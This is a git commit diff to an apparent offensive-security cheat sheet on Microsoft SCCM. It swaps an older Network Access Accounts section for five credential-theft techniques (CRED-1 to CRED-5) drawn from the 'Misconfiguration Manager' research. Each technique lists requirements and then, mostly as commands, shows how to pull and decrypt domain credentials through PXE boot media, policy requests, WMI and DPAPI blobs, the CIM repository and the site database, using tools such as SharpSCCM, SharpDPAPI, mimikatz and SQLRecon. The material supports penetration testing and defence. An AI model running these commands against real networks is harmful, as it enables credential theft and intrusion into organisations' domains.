SCCM - CRED1 to CRED5

2024-03-19 21:54:19 +01:00 · 2024-03-19 21:54:19 +01:00 · 1cee3b6738
parent 7257e153b8
commit 1cee3b6738
1 changed files with 141 additions and 31 deletions
--- a/docs/active-directory/deployment-sccm.md
+++ b/docs/active-directory/deployment-sccm.md
@ -63,36 +63,6 @@
    ```


-## Network Access Accounts
-
-> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
-
-On the machine
-
-* Find SCCM blob
-    ```ps1
-    Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
-    NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
-    NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
-    ```
-* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
-    ```ps1
-    .\SharpDPAPI.exe SCCM
-    .\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
-    ```
-* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
-    ```ps1
-    Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
-    ConvertFrom-SddlString ""
-    ```
-
-From a remote machine.
-* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter)
-    ```ps1
-    python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto
-    ```
-
-
 ## SCCM Shares

 > Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
@ -105,6 +75,145 @@ From a remote machine.
  ```


+## Configuration Manager
+
+### CRED-1 Retrieve credentials via PXE boot media
+
+* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
+
+Requirements:
+
+* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
+* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
+* PXE-enabled distribution point
+
+Exploitation:
+
+* [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
+    ```ps1
+    sudo python3 pxethiefy.py explore -i eth0
+    ```
+* [MWR-CyberSec/PXEThief](https://github.com/MWR-CyberSec/PXEThief)
+
+
+### CRED-2 Request a policy containing credentials
+
+* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
+
+
+Requirements:
+
+* PKI certificates are not required for client authentication
+* Domain accounts credential
+
+Exploitation:
+
+Create a machine or compromise an existing one, then request policies such as `NAAConfig`
+
+```ps1
+SharpSCCM get secrets -u <username-machine-$> -p <password>
+SharpSCCM get naa
+```
+
+
+### CRED-3 Extract currently deployed credentials stored as DPAPI blobs and decrypt
+
+> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
+
+* [Misconfiguration-Manager - CRED-3](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-3/cred-3_description.md)
+
+
+**Requirements**:
+
+* Local administrator privileges on an SCCM client
+
+
+**Exploitation**:
+
+* Find SCCM blob
+    ```ps1
+    Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
+    NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
+    NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
+    ```
+
+* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) 
+    ```ps1
+    $str = "060...F2DAF"
+    $bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++}
+    $b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
+    .\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt    
+    ```
+
+* Using [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
+    ```ps1
+    .\SharpSCCM.exe local secrets -m wmi
+    ```
+
+From a remote machine.
+
+* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter)
+    ```ps1
+    python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto
+    ```
+
+
+### CRED-4 Extract legacy credentials stored as DPAPI blobs and decrypt
+
+* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
+
+**Requirements**:
+
+* Local administrator privileges on an SCCM client
+
+
+**Exploitation**:
+
+* Search the database using `SharpDPAPI`
+    ```ps1
+    .\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA
+    ```
+
+* Search the database using `SharpSCCM`
+    ```ps1
+    .\SharpSCCM.exe local secrets -m disk
+    ```
+
+* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
+    ```ps1
+    Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
+    ConvertFrom-SddlString ""
+    ```
+
+
+
+### CRED-5 Extract and decrypt the SC_UserAccount table from the site database
+
+* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
+
+**Requirements**:
+
+* Site database access
+* Primary site server access
+    * Access to the private key used for encryption
+
+**Exploitation**:
+
+* [gentilkiwi/mimikatz](https://twitter.com/gentilkiwi/status/1392204021461569537)
+    ```ps1
+    mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;"
+    ```
+* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon), only if the site server and database are hosted on the same system
+    ```ps1
+    SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials
+    ```
+* SQLRecon + [xpn/sccmdecryptpoc.cs](https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1)
+    ```ps1
+    SQLRecon.exe /auth:WinToken /host:<SITE-DB> /database:CM_<SITECODE> /module:query /command:"SELECT * FROM SC_UserAccount"
+    sccmdecryptpoc.exe 0C010000080[...]5D6F0
+    ```
+
+
 ## References

 * [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
@ -112,4 +221,5 @@ From a remote machine.
 * [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/)
 * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
 * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
-* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
+* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
+* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d)